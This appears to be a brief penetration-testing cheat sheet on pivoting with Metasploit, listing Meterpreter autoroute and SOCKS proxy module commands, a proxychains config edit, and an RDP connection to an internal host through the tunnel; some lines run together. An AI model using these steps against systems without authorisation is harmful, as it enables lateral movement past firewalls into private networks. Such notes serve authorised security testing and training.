MetaSploit
We’ll use reverse proxying to access machines that are protected by edge firewalls and Network Address Translation (NAT) configs

From Meterpreter
Send session to background
use multi/manage/autoroute
set session 1
exploituse auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set version 4a
exploit -jThe autoroute module creates a reverse tunnel and allows us to direct network traffic into the appropriate subnet
Add socks config to conf file
sudo bash -c 'echo "socks4 127.0.0.1 1080" >> /etc/proxychains4.conf'can now rdp
proxychains rdesktop 192.168.220.129The route created by Meterpreter also allows us to access any other computer on that internal network.
set version 5 (for Metasploit module)
socks5 127.0.0.1 1080 (for config file)
Last updated